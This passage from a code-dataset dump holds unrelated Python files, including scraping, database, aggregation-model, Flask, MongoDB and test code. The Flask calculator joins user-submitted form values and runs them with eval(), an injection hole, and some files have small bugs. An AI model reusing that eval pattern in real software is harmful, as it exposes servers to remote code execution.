range(0, len(page)):\n\t\t\tmID = SToI(page[i].split(\"/\")[2])\n\t\t\texistsInDB = GetMatchByID(mID)\n\t\t\tif existsInDB == None:\n\t\t\t\tmatch = GetMatch(page[i])\n\t\t\t\tif match != None:\n\t\t\t\t\tsuc1 = InsertMatchToDB(match[0])\n\t\t\t\t\tfor m in match[1]:\n\t\t\t\t\t\tInsertMapToDB(m)\n\t\t\telse:\n\t\t\t\tprint(\"existsInDB:\", existsInDB)\n\t\t\tif i == 24:\n\t\t\t\tprint('''25% of page done!''')\n\t\t\telif i == 49:\n\t\t\t\tprint('''50% of page done!''')\n\t\t\telif i == 74:\n\t\t\t\tprint('''75% of page done!''')\n\t\t\telif i == 99:\n\t\t\t\tprint('''100% of page done!''')\n\t\tprint(\"Finished parsing page\", j)\n\ndef batchLoader():\n\tmdebug = False\n\tminerRunning = True\n\tmcsgoDB = DB(\"mcsgo.db\")\n\n\t# Start from page 0\n\tcurpage = 3\n\twhile minerRunning:\n\t\tbatchtime = 5.0 # 5 sec per batch\n\t\tstarttime = time.time()\n\t\tsess = requests.Session()\n\t\t# Batch of 100 matches from results page\n\t\tmpage = GetMatchResultsPage(curpage, mdebug)\n\t\t\n\t\tfor p in mpage:\n\t\t\tmID = SToI(p.split(\"/\")[2])\n\t\t\texistsInDB = mcsgoDB.GetMatchByID(mID, mdebug)\n\t\t\tif existsInDB == None:\n\t\t\t\tmatch = GetMatch(p, mdebug)\n\t\t\t\tif match != None:\n\t\t\t\t\tsuc1 = mcsgoDB.InsertMatch(match[0], mdebug)\n\t\t\t\t\tfor m in match[1]:\n\t\t\t\t\t\tsuc2 = mcsgoDB.InsertMap(m, mdebug)\n\t\t\telse:\n\t\t\t\tprint(\"existsInDB:\", existsInDB)\n\t\t\t\tbatchtime -= 0.05\n\n\t\tsleeptime = batchtime - (time.time() - starttime)\n\t\tprint(sleeptime)\n\t\tif sleeptime > 0: # Sleep a bit if we are progressing too fast\n\t\t\ttime.sleep(sleeptime)\n\t\t\tprint(\"SLEEPPINK\")\n\t\tcurpage += 1\n\ndef main():\n\tprint(\"\\n---HLTVminer starting---\")\n\tdebug = False\n\n\tbatchLoader()\n\t#events = GetFinishedEvents(0, minerdbg)\n\n\t#res = GetTesting()\n\t#print(res)\n\n\t#res1 = GetMatchByID(match[0][0],dbdbg)\n\t#print(\"matchQuery:\", res1)\n\t#for m in match[1]:\n\t#\tres2 = GetMapByID(m[0],dbdbg)\n\t#\tres3 = GetPlayerStatsByMapID(m[0], dbdbg)\n\t#\tprint(\"mapQuery:\", res2)\n\t#\tprint(\"playerStatsQuery:\", res3)\n\n\t#res4 = GetMapsByMatchID(match[0][0], dbdbg)\n\t#print(\"mapsByMatchIDQuery:\", res4)\n\n\t#ongo = InsertEventToDB([\"MFirstEvent\", \"8+\", \"$200,000\", \"Intl. LAN\"], dbdbg)\n\t#ongo2 = InsertEventToDB([\"MSecondEvent\", \"16+\", \"$10,000\", \"Local LAN\"], dbdbg)\n\t#ongo3 = InsertEventToDB([\"MThirdEvent\", \"4\", \"Other\", \"Online\"], dbdbg)\n\n\t#res1 = GetEventByName(\"MFirstEvent\", dbdbg)\n\t#res2 = GetEventByName(\"MSecondEvent\", dbdbg)\n\t#res3 = GetEventByName(\"MThirdEvent\", dbdbg)\n\t#print(res1, res2, res3)\n\n\tprint(\"---HLTVminer quitting---\")\n\t\n\nmain()","sub_path":"HLTVminer.py","file_name":"HLTVminer.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"618009316","text":"import pprint as pp\nfrom decimal import Decimal\nfrom datetime import datetime, date, timedelta\nimport time\nimport mysql.connector\n\ndef node_up_duration():\n\tdb = mysql.connector.connect(user='root', database='log')\n\tcursor = db.cursor()\n\tcursor.execute(\"SELECT event_time, name, event_type from event_node ORDER BY event_time ASC;\")\n\tdata = cursor.fetchall()\n\tnode_life = {}\n\tfor row in data:\n\t\ttime = row[0]\n\t\tname = row[1]\n\t\tevent = row[2]\n\t\tif event == 'NODEUP':\n\t\t\tif name not in node_life:\n\t\t\t\tnode_life[name] = time\n\t\telif event == 'NODEDOWN':\n\t\t\tif name in node_life:\n\t\t\t\tinsert_duration(node_life[name], time, name, db)\n\tdb.close()\n\ndef insert_duration(up, down, name, db):\n\tf = '%Y-%m-%d %H:%M:%S'\n\tduration = (down - up).total_seconds()\n\tup = up.strftime(f) \n\tdown = down.strftime(f) \n\tcursorA = db.cursor()\n\tcursorA.execute(\"INSERT INTO node_intervals (up_time, down_time, name, duration) VALUES (%s, %s, %s, %s )\",(up, down, name, duration))\n\tdb.commit()\n\nnode_up_duration()\n","sub_path":"src/node_up_duration.py","file_name":"node_up_duration.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"142532050","text":"\"\"\"\nBecause we are not allowed division we maintain 2 arrays of precomputed products before and after a particular index. \nBoth these arrays can be constructed in O(n) time and O(n) space.\n\nWorks on leet code \nTime Complexity - O(n)\nSpace Complexity - O(n)\n\"\"\"\nfrom collections import deque\nclass Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n N = len(nums)\n if N <= 1 :\n return None # edge case .. should never happen\n\n left = [1] \n right = deque() \n right.appendleft(1)\n for i in range(N-1) :\n left.append(left[-1]*nums[i])\n right.appendleft(right[0]*nums[N-i-1])\n\n return [left[i]*right[i] for i in range(N)]\n\n\n","sub_path":"product_except_self.py","file_name":"product_except_self.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"81676444","text":"import os\nimport time\nimport pyjags\nimport warnings\nimport numpy as np\nimport multiprocessing as mp\nimport peerprediction.tools.PeerSampler as ps\n\n\n\n###############################################\n# Aggregation algorithm Spectral Meta-Learner #\n###############################################\n\nclass SpectralMetaLearner(object):\n\n # Method initializing aggregating\n # parameters: reports - ndarray (dim=N*M or N >= 2, M >= 2))\n def aggregate(self, ls):\n labels = ls * 2 - 1\n self.labels = labels\n self.find_eig()\n\n def create_cov_mat(self):\n n_voters = self.labels.shape[0]\n n_tasks = self.labels.shape[1]\n\n voters_means = np.mean(self.labels, axis=1)\n centered_labels = self.labels - voters_means[:, None]\n\n normalizer = 1.0 / (n_tasks - 1)\n cov_mat = np.dot(centered_labels,\n np.transpose(centered_labels)) * normalizer\n\n self.cov_mat_ = cov_mat\n\n def create_left(self, n_unk):\n n_eq = int((n_unk-1)*(n_unk)/2)\n mat = np.zeros((n_eq, n_unk))\n i = 0\n j = 1\n counter = 0\n\n while counter < n_eq:\n mat[counter, i] = 1\n mat[counter, j] = 1\n if j == n_unk-1:\n i += 1\n j = i+1\n else:\n j += 1\n counter += 1\n\n return mat\n\n def create_both(self):\n n_unk = self.cov_mat_.shape[0]\n n_eq = int((n_unk-1)*(n_unk)/2)\n left_side = self.create_left(n_unk)\n right_side = np.zeros(n_eq)\n\n counter = 0\n\n while counter < n_eq:\n idx = np.where(left_side[counter, :] == 1)[0]\n right_side[counter] = self.cov_mat_[idx[0], idx[1]]\n counter += 1\n\n return left_side, right_side\n\n def solve_linear_system(self):\n left_side, right_side = self.create_both()\n selector = right_side != 0\n new_l = left_side[selector, :]\n new_r = np.log(np.abs(right_side[selector]))\n\n pseudo_inv = np.linalg.pinv(new_l)\n ols_solution = np.dot(pseudo_inv, new_r)\n\n return ols_solution\n\n def generate_rank1_mat(self):\n diag = self.solve_linear_system()\n n = self.cov_mat_.shape[0]\n rank1_mat = np.copy(self.cov_mat_)\n\n self.overflow_ = False\n\n for i in range(n):\n diagonal_element = np.exp(2*diag[i])\n if np.isinf(diagonal_element):\n self.overflow_ = True\n warnings.warn(\"Warning: One of the diagonal elements of rank-1 \\\n matrix overflowed. Original covariance matrix will be used instead \\\n for eigendecompostition\")\n break\n else:\n rank1_mat[i, i] = diagonal_element\n\n self.rank1_mat_ = rank1_mat\n\n def find_eig(self):\n self.create_cov_mat()\n self.generate_rank1_mat()\n\n if self.overflow_:\n w, v = np.linalg.eig(self.cov_mat_)\n else:\n w, v = np.linalg.eig(self.rank1_mat_)\n\n idx = np.argmax(w)\n largest_eig = v[:, idx]\n\n if np.mean(largest_eig) < 0:\n largest_eig = -largest_eig\n\n self.eig_ = largest_eig\n\n # Shows aggregated reports\n # Returs: recovered_ground_truth_ - ndarray (dim=M)\n def predict(self):\n pred = (np.dot(np.transpose(self.labels), self.eig_) > 0).astype(int)\n return pred\n\n##############################################################\n# Aggregation algorithm Hierarchical General Condorcet Model #\n##############################################################\n\nclass HGCM(object):\n\n # Constructor\n # parameters: adapt - number of adapting iterations for Gibbs Sampler\n # iterations - number of sampling iterations for Gibbs Sampler\n # chains - number of chains for Gibbs Sampler\n # thin - thinning interval for Gibbs Sampler\n # progress_bar - shows progress bar if True\n # threads - number of threads to use\n def __init__(self, adapt=1000, iterations=1000, chains=4, thin=1, progress_bar=True, threads=1):\n\n self.adapt = adapt\n self.iterations = iterations\n self.chains = chains\n self.thin = thin\n self.progress_bar = progress_bar\n self.threads = threads\n\n # Method initializing aggregating\n # parameters: reports - ndarray (dim=N*M or N >= 2, M >= 2))\n def aggregate(self, reports):\n script_path = os.path.abspath(__file__)\n script_dir = os.path.abspath(os.path.join(script_path, os.pardir))\n path = os.path.join(script_dir, 'hgcm_model.jags')\n\n n = reports.shape[0]\n m = reports.shape[1]\n Xtheta = np.transpose(np.array([np.ones(n)]))\n Xg = np.transpose(np.array([np.ones(n)]))\n Xdelta = np.transpose(np.array([np.ones(m)]))\n\n model = pyjags.Model(file=path, data=dict(Y=reports, n=n, m=m,\n nrofdeltacov=1, nrofgcov=1, nrofthetacov=1,\n Xtheta=Xtheta, Xg=Xg, Xdelta=Xdelta), chains=self.chains,\n adapt=self.adapt, progress_bar=self.progress_bar, threads=self.threads)\n\n self.run_sampling(model)\n\n def run_sampling(self, model):\n samples = model.sample(self.iterations, vars=['Z'], thin=self.thin)\n self.recovered_ground_truth_ = (np.mean(np.mean(samples['Z'], axis=2), axis=1) > 0.5).astype(int)\n\n # Shows aggregated reports\n # Returs: recovered_ground_truth_ - ndarray (dim=M)\n def predict(self):\n return self.recovered_ground_truth_\n\n########################################\n# Aggregation algorithm Two-coin Model #\n########################################\n\nclass TwoCoinModel(object):\n\n # Constructor\n # parameters: epsilon - convergence threshold\n # iterations - number of iterations of EM algorithm to do.\n # Can stop earlier if convergence criterion met\n def __init__(self, epsilon=0.01, iterations=10000):\n self.epsilon = epsilon\n self.iterations = iterations\n self.iterations_done = 0\n\n # Method initializing aggregating\n # parameters: reports - ndarray (dim=N*M or N >= 2, M >= 2))\n def aggregate(self, reports):\n\n myus = np.mean(reports, axis=0)\n\n for i in range(self.iterations):\n alphas, betas, p = self.update_parameters(reports, myus)\n new_myus = self.update_myus(reports, alphas, betas, p)\n\n diff = np.sum(np.abs(myus - new_myus))\n myus = new_myus\n\n if diff < self.epsilon:\n break\n\n self.iterations_done += 1\n\n if self.iterations_done == self.iterations and diff >= self.epsilon:\n warnings.warn(\"Warning: EM algorithm did not converge\")\n\n self.myus_ = myus\n\n # Shows aggregated reports\n # Returs: recovered_ground_truth_ - ndarray (dim=M)\n def predict(self):\n pred = (self.myus_ > 0.5).astype(int)\n return pred\n\n def update_parameters(self, reports, myus):\n alphas = np.dot(reports, myus) / np.sum(myus)\n betas = np.dot(1 - reports, 1 - myus) / np.sum(1 - myus)\n p = np.mean(myus)\n\n return alphas, betas, p\n\n def update_myus(self, reports, alphas, betas, p):\n a_temp = (alphas ** np.transpose(reports)) * \\\n ((1 - alphas) ** np.transpose(1 - reports))\n a = np.prod(np.transpose(a_temp), axis=0)\n\n b_temp = (betas ** np.transpose(1 - reports)) * \\\n ((1 - betas) ** np.transpose(reports))\n b = np.prod(np.transpose(b_temp), axis=0)\n\n myus_numer = a * p\n myus_denom = a * p + b * (1 - p)\n myus = myus_numer / myus_denom\n\n return myus\n\n#########################################################################################\n# Class performing evaluation of subjective truthfulness of aggregation-based mechanism #\n#########################################################################################\n\nclass SubjectiveAggregator(object):\n\n # Constructor\n # parameters: reports - ndarray (dim=N*M or M, M >= 2)\n # beliefs - ndarray (dim=N*M or M, M >= 2)\n # agg - aggregation algorithm class, should have methods aggregate() and predict()\n # sampler - sampling method to use. Can be 'simple' for Bernoulli sampling or 'smart_v1'\n # for smart sampling using original dataset\n # n_sampled_peers - number of peers to sample when using sampling\n # inner_loops - number of times sampling and aggregation should be repeated\n # kwargs - additional arguments for aggregation algorithm agg\n def __init__(self, reports, beliefs, agg, sampler='simple', n_sampled_peers=100, inner_loops=1, **kwargs):\n\n if len(reports.shape) == 1:\n reports = np.array([reports])\n\n if len(beliefs.shape) == 1:\n beliefs = np.array([beliefs])\n\n if reports.shape != beliefs.shape:\n print('Shapes of reports and beliefs do not match.')\n\n self.reports = reports\n self.beliefs = beliefs\n self.agg = agg\n self.sampler = sampler\n self.n_sampled_peers = n_sampled_peers\n self.inner_loops = inner_loops\n self.kwargs = kwargs\n\n def sample_agents(self, beliefs):\n np.random.seed()\n\n if self.sampler == 'simple':\n sampled_agents = ps.sample_peers(beliefs, self.n_sampled_peers)\n elif self.sampler == 'smart_v1':\n sampled_agents = ps.smart1(beliefs, self.n_sampled_peers, self.reports)\n\n return sampled_agents\n\n def run_for_single_agent(self, beliefs, assignment):\n\n all_pred = []\n\n current_belief = beliefs[assignment]\n\n for i in range(self.inner_loops):\n sampled_agents = self.sample_agents(current_belief)\n local_agg = self.agg(**self.kwargs)\n\n local_agg.aggregate(sampled_agents)\n pred = local_agg.predict()\n if self.inner_loops > 1:\n all_pred.append(pred)\n else:\n print('agent {} done'.format(assignment))\n return pred\n\n print('agent {} done'.format(assignment))\n return np.transpose(np.array(all_pred))\n\n def run_process(self, beliefs, assignments, output_queue):\n\n total_tasks = assignments.shape[0]\n\n for i in range(total_tasks):\n result = self.run_for_single_agent(beliefs, assignments[i])\n output_queue.put((assignments[i], result))\n\n # Initiates main computation.\n # parameters: num_processes - number of processors to use for concurrency\n def run_computation(self, num_processes=1):\n\n num_agents = self.reports.shape[0]\n to_be_done = np.arange(num_agents)\n\n results = []\n\n while to_be_done.shape[0] > 0:\n\n que = mp.Queue()\n proc_assignments = np.array_split(to_be_done, num_processes)\n\n processes = [mp.Process(target=self.run_process, args=(self.beliefs, proc_assignments[i], que)) for i in range(num_processes)]\n\n for p in processes:\n p.start()\n\n ### IMPORTANT, prevents deadlock\n liveprocs = list(processes)\n while liveprocs:\n try:\n while 1:\n results.append(que.get(False))\n except mp.queues.Empty:\n pass\n\n # Give tasks a chance to put more data in\n time.sleep(0.5)\n\n if not que.empty():\n continue\n liveprocs = [p for p in liveprocs if p.is_alive()]\n ### END IMPORTANT\n\n for p in processes:\n p.join()\n\n while not que.empty():\n results.append(que.get())\n\n agents_done = np.array([r[0] for r in results])\n agents_left = np.setdiff1d(to_be_done, agents_done)\n to_be_done = agents_left\n\n results.sort(key = lambda t: t[0])\n results = [r[1] for r in results]\n results = np.array(results)\n\n if self.inner_loops > 1:\n self.raw_aggregated_reports_ = np.transpose(results, axes=(2, 0, 1))\n else:\n self.raw_aggregated_reports_ = results\n\n # Outputs results of main computation\n # Returns: ndarray (dim=N*M or M), where entry (i, j) = 1 if\n # mechanism is truthfull for agent i on task j, 0 otherwise.\n def show_subjective_truthfulness(self):\n truthfulness = (np.mean(self.reports == self.raw_aggregated_reports_, axis=0) \\\n > 0.5).astype(int)\n return truthfulness\n\n#################################################################################\n# This code allows using aggregation algorithms as mechanisms for paying agents #\n#################################################################################\n\nclass AggregationMechanism(object):\n\n # Constructor\n # parameters: reports - ndarray (dim=N*M or N >= 2, M >= 2)\n # agg - aggregation algorithm class, should have methods aggregate() and predict()\n # kwargs - additional arguments for aggregation algorithm agg\n # sampling - estimation method will be used if sampling=True\n # num_samp - number of peers to sample if sampling=True\n def __init__(self, reports, agg, **kwargs):\n self.reports = reports\n self.agg = agg\n self.kwargs = kwargs\n\n # Method to initialize calculation of payments\n def produce_payments(self):\n n = self.reports.shape[0]\n m = self.reports.shape[1]\n\n payments = []\n\n for i in range(n):\n cur_rep = self.reports[i, :]\n other_reps = np.delete(self.reports, i, axis=0)\n\n local_agg = self.agg(**self.kwargs)\n local_agg.aggregate(other_reps)\n\n aggregated = local_agg.predict()\n\n cur_payment = (cur_rep == aggregated).astype(int)\n payments.append(cur_payment)\n\n self.payments = np.array(payments)\n\n # Shows payment matrix\n # Returns: payments_ - ndarray (dim=N*M), where entry (i, j) is reward of agent i\n # on task j\n def show_payments(self):\n return self.payments\n","sub_path":"peerprediction/aggregation.py","file_name":"aggregation.py","file_ext":"py","file_size_in_byte":14338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"256421951","text":"import pandas as pd\n\ndef process_data(path_to_df):\n \n df1 = (\n pd.read_csv(path_to_df, header=None)\n .rename(columns = {0: 'Age', 1: \"Workclass\", 2: \"Final Weight\", 3: \"Education\", 4: \"Education Num\", 5: \"Marital Status\", 6: \"Occupation\", 7: \"Relationship\", 8: \"Race\", 9: \"Sex\", 10: \"Capital Gain\", 11: \"Capital Loss\", 12: \"Hours per Week\", 13: \"Native Country\", 14: \"Salary\"})\n .fillna(method=\"ffill\")\n .drop(columns={'Education Num', 'Final Weight', 'Capital Gain', 'Capital Loss'})\n )\n \n return df1\n\ndef find_and_replace(dataframe, column_name, find, replace):\n dataframe[column_name] = dataframe[column_name].str.replace(find, replace, regex=True)","sub_path":"data/processed/scripts/load_script.py","file_name":"load_script.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"343155275","text":"# Import Flask Library\n#from flask import Flask\n# create a Flask application instance\n#app = Flask(__name__)\n# define a route through the app.route decorator\n#from server import app\n#@app.route(\"/\")\n#def index():\n #return \"

Hello World!

\"\n# launch the integrated development web server\n# and run the app on http://localhost:8085\n#if __name__==\"__main__\":\n# app.run(debug=True,port=8085)\n#from server import app\n#@app.route(\"/\")\n#def index():\n# return \"

Hello world

\"\nfrom flask import Flask, redirect, render_template, request, url_for\nfrom server import app\nimport math\ncalc_input = []\nflag = False\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef calculator():\n\tglobal calc_input\n\tglobal flag\n\tif flag == True: \n\t\tcalc_input = []\n\t\tflag = False\n\tmystr = \"\"\n\tbuttons = \"1 2 3 C 4 5 6 + 7 8 9 - 0 * / = ( ) sin tan cos log sqrt CE \".split(\" \")\n\tif request.method == \"POST\":\n\t\tif (request.form[\"button\"] == \"=\"):\n\t\t\tfor i in calc_input:\n\t\t\t\tmystr += i\n\t\t\tcalc_input = []\n\t\t\tcalc_input.append(eval(mystr))\n\t\t\tflag = True\n\t\telif (request.form[\"button\"] ==\"C\"):\n\t\t\tcalc_input.pop()\n\t\telif (request.form[\"button\"] == \"CE\"):\n\t\t\tdel calc_input[:]\n\t\telse:\n\t\t\tcalc_input.append(request.form[\"button\"])\n\n\treturn render_template(\"index.html\" , output=calc_input, buttons=buttons, length=len(buttons))\n \n","sub_path":"lab05/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"304650963","text":"from futile.logging import LoggerMixin\nfrom pymongo import MongoClient\n\n\nclass MongoWrapper(LoggerMixin):\n \"\"\" Wraps a MongoDB connection.\n\n @note: Specifically created for MongoNA and MongoUI (Chile).\n @requires: pymongo\n \"\"\"\n __sensors = []\n\n def __init__(self, host=None, port=None, db=\"mtc_store\", *args, **kw):\n \"\"\" init\n\n @param host: mongoDB server address\n @param port: mongoDB server port\n @param db: mongo database name\n \"\"\"\n self.db = db\n if host and port:\n self.client = MongoClient(host, port)\n else:\n self.client = MongoClient()\n\n self.db = self.client[db]\n\n def trace(self, msg):\n \"\"\" Convenience method for low priority logging.\n\n @param msg: log message\n \"\"\"\n # DEBUG == 10\n self.logger.log(0, msg)\n\n def store_data(self, scl, sensor, data):\n \"\"\" Stores data in the collection of the sensor.\n Updates the scls collection with info about the scl and sensor.\n\n @param scl: scl ID\n @param sensor: sensor ID\n @param data: document data\n \"\"\"\n self.trace(\"storing data: %s %s\" % (sensor, data))\n if not sensor:\n return # ignore data without sensor ID\n\n if sensor.startswith(scl):\n sensor_id = sensor.replace(scl, scl.replace(\"-\", \"_\") + \"_\")\n else:\n sensor_id = scl.replace(\"-\", \"_\") + \"__\" + sensor\n if sensor_id not in self.__sensors:\n self.__sensors.append(sensor_id)\n # self.db[\"sensors\"].insert({ \"_id\": sensor})\n self.db[\"scls\"].update({\"_id\": scl},\n {\"$addToSet\": {\"sensors\": sensor_id}},\n upsert=True, )\n\n sensor = self.db[sensor_id]\n sensor.insert(data)\n\n def get_sensors(self, scl):\n \"\"\" Retrieves the sensors field of a document with _id == scl.\n\n @param scl: scl ID\n @return: list of sensors for the specified scl\n \"\"\"\n sensors = sorted(self.db[\"scls\"].find_one({\"_id\": scl})[\"sensors\"],\n cmp=lambda x, y: cmp(str(x), str(y)))\n # sensors = self.db.collection_names(include_system_collections=False)\n self.trace(\"found sensors: %s\" % (sensors))\n return sensors\n\n def get_sensor_data(self, sensor, limit=1000, skip=0):\n \"\"\" Retrieves all documents from the sensor's collection.\n\n @param sensor: unique sensor ID\n @param limit: (optional) result size limit\n @param skip: amount of documents to skip\n @return: list of documents found\n \"\"\"\n sensor = self.db[sensor]\n sensor.ensure_index(\"DescriptionDate\", background=True)\n cursor = sensor.find(fields={\"_id\": 0},\n limit=limit,\n sort=[(\"DescriptionDate\", 0)],\n skip=skip)\n self.trace(\"found %s documents.\" % (cursor.count()))\n return list(cursor)\n\n def get_scls(self):\n \"\"\" Retrieves all documents from the scls collection.\n\n @return: list of documents found\n \"\"\"\n cursor = self.db[\"scls\"].find(sort=[(\"_id\", 1)])\n return list(cursor)\n","sub_path":"eds/openmtc-gevent/openmtc-app/src/openmtc_app/db/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"357514338","text":"'''\r\n\r\nTest create/restore snapshot functions, which will be happed on a running VM. \r\n\r\nThis test is to simulate user save/restore snapshot on a real running VM. \r\nThe test will be skipped, if host doesn't support live snapshot operations.\r\n\r\nWhen delete a snapshot in the middle of snapshot chain, libvirt will merge\r\nthe rest snapshots to base. The operation is only valid to living vm, only if \r\nlibvirt version is larger than 1.2.7 . If libvirt is less than 1.2.7, it needs\r\nto stop VM, before delete snapshot. It will be covered in \r\ntest_crt_sp_in_live_vm.py2\r\n\r\n@author: Youyk\r\n'''\r\nimport zstackwoodpecker.test_util as test_util\r\nimport zstackwoodpecker.test_lib as test_lib\r\nimport zstackwoodpecker.test_state as test_state\r\nimport zstackwoodpecker.zstack_test.zstack_test_snapshot as zstack_sp_header\r\nfrom distutils.version import LooseVersion\r\n\r\nimport os\r\nimport time\r\n\r\ntest_stub = test_lib.lib_get_test_stub()\r\ntest_obj_dict = test_state.TestStateDict()\r\n\r\ndef test():\r\n test_util.test_dsc('Create test vm as utility vm')\r\n vm1 = test_stub.create_vlan_vm()\r\n test_obj_dict.add_vm(vm1)\r\n #this test will rely on live snapshot capability supporting\r\n host_inv = test_lib.lib_find_host_by_vm(vm1.get_vm())\r\n\r\n if not test_lib.lib_check_live_snapshot_cap(host_inv):\r\n vm1.destroy()\r\n test_obj_dict.rm_vm(vm1)\r\n test_util.test_skip('Skip test, since [host:] %s does not support live snapshot.' % host_inv.uuid)\r\n\r\n live_snapshot = test_lib.lib_check_live_snapshot_cap(host_inv)\r\n if not live_snapshot:\r\n vm1.destroy()\r\n test_obj_dict.rm_vm(vm1)\r\n test_util.test_skip(\"Skip test, since [host:] %s doesn't support live snapshot \" % host_inv.uuid)\r\n\r\n vm = test_stub.create_vlan_vm()\r\n test_obj_dict.add_vm(vm)\r\n\r\n test_util.test_dsc('Create volume for snapshot testing')\r\n disk_offering = test_lib.lib_get_disk_offering_by_name(os.environ.get('smallDiskOfferingName'))\r\n volume_creation_option = test_util.VolumeOption()\r\n volume_creation_option.set_name('volume for snapshot testing')\r\n volume_creation_option.set_disk_offering_uuid(disk_offering.uuid)\r\n volume1 = test_stub.create_volume(volume_creation_option)\r\n test_obj_dict.add_volume(volume1)\r\n volume2 = test_stub.create_volume(volume_creation_option)\r\n test_obj_dict.add_volume(volume2)\r\n #make sure utility vm is starting and running\r\n vm.check()\r\n\r\n volume1.attach(vm1)\r\n volume2.attach(vm1)\r\n\r\n test_util.test_dsc('create snapshot for root')\r\n vm_root_volume_inv = test_lib.lib_get_root_volume(vm1.get_vm())\r\n snapshots = test_obj_dict.get_volume_snapshot(vm_root_volume_inv.uuid)\r\n snapshots.set_utility_vm(vm)\r\n snapshots.create_snapshot('create_root_volume_snapshot1')\r\n volume1.check()\r\n volume2.check()\r\n\r\n snapshots2 = test_obj_dict.get_volume_snapshot(volume1.get_volume().uuid)\r\n snapshots2.set_utility_vm(vm)\r\n snapshots2.create_snapshot('create_data_volume_snapshot1')\r\n snapshots.check()\r\n volume1.check()\r\n volume2.check()\r\n\r\n test_lib.lib_robot_cleanup(test_obj_dict)\r\n test_util.test_pass('Create root Snapshot and test data volume status test Success')\r\n\r\n#Will be called only if exception happens in test().\r\ndef error_cleanup():\r\n test_lib.lib_error_cleanup(test_obj_dict)\r\n","sub_path":"integrationtest/vm/virtualrouter/snapshot/test_crt_root_sp_in_live_vm_and_data.py","file_name":"test_crt_root_sp_in_live_vm_and_data.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"364407488","text":"#coding:utf-8\nclass Node(object):\n __slots__ = ['_value', '_next']\n def __init__(self, item):\n self._value = item\n self._next = None\n\n def getValue(self):\n return self._value\n\n def getNext(self):\n return self._next\n\n def setValue(self, value):\n self._value = value\n\n def setNext(self, newnext):\n self._next = newnext\n\n\n#单链表的操作\n\"\"\"\n 1.初始化\n\n #插入\n 2.在头部插入节点\n 3.在尾部追加节点\n 4.在指定index下插入节点\n\n #删除\n 5.删除头节点\n 6.删除尾节点\n 7.删除指定index的节点 \n\n 8.遍历单链表\n 9.查找第index个节点(按坐标查找)\n 10.查找value节点(按值查找)\n\"\"\"\nclass LinkList(object):\n def __init__(self):\n self._head = None\n \n def isEmpty(self):\n return self_head == None\n\n def size(self):\n current = self._head\n length = 0\n while current != None:\n current = current.getNext()\n length += 1\n return length\n\n def add(self, value):\n tmp = Node(value)\n tmp.setNext(self._head)\n self._head = tmp\n\n def append(self, value):\n tmp = Node(value)\n if isEmpty():\n self._head = tmp\n else:\n current = self._head\n while current.getNext() != None:\n current = current.getNext()\n current.setNext(tmp)\n\n def insert(self, index, value):\n if index <= 1:\n self.add(value)\n elif index > self.size():\n self.append(value)\n else:\n current = self._head\n cnt = 1\n while cnt != index-1:\n cnt += 1\n current = current.getNext()\n tmp = Node(value)\n right = current.getNext()\n current.setNext(tmp)\n tmp.setNext(right)\n\n\n\n\nif __name__ == '__main__':\n l = LinkList()\n","sub_path":"python/linklist.py","file_name":"linklist.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"542257694","text":"import re\ncomments = ['lmplementation note', 'changed', 'ABC for generator']\npattern = \"......\"\n\n\ndef add_ellipsis(n: int, string):\n for i in range(len(string)):\n if len(string[i]) >= n:\n regex = re.compile(string[i][n:])\n newstr = regex.sub(pattern, string[i])\n string[i] = newstr\n\n print(string)\n\n\nadd_ellipsis(10, comments)\n\n# 元组的话是不是可以转成列表后操作,不知道理解的对不对\n# comments = ('lmplementation note', 'changed', 'ABC for generator')\n# pattern = \"......\"\n#\n#\n# def add_ellipsis(n: int, string):\n# comment = list(string)\n# for i in range(len(comment)):\n# if len(comment[i]) >= n:\n# regex = re.compile(comment[i][n:])\n# newstr = regex.sub(pattern, comment[i])\n# comment[i] = newstr\n# print(comment)\n\n#\n# add_ellipsis(4, comments)","sub_path":"p17038-吴永峰/第四次作业/strsub.py","file_name":"strsub.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"334583435","text":"from redata.models.base import Base\nfrom sqlalchemy import TIMESTAMP, Boolean, Column, Integer, String, BigInteger, Date, Float, Index\nfrom redata.db_operations import metrics_session\nfrom sqlalchemy.dialects.postgresql import JSONB\nfrom datetime import datetime\nfrom sqlalchemy import Index\nfrom sqlalchemy import ForeignKey\nfrom redata.metric import Metric\n\n\nclass MetricFromCheck(Base):\n __tablename__ = 'metric'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n check_id = Column(Integer, ForeignKey('checks.id'), index=True)\n table_id = Column(Integer, ForeignKey('monitored_table.id'), index=True)\n table_column = Column(String, index=True)\n\n metric = Column(String, index=True)\n params = Column(JSONB)\n result = Column(JSONB)\n\n created_at = Column(TIMESTAMP, default=datetime.utcnow, index=True, primary_key=True)\n\n @classmethod\n def add_metrics(cls, results, check, conf):\n\n print (f\"Adding results for check: {check}\")\n for row in results:\n \n for col, metrics in check.metrics.items():\n\n for m in metrics:\n select_name = col + '_' + m if col != Metric.TABLE_METRIC else m\n\n m = MetricFromCheck(\n check_id=check.id,\n table_id=check.table.id,\n table_column=col if col else None,\n params=check.query['params'],\n metric=m,\n result={\n 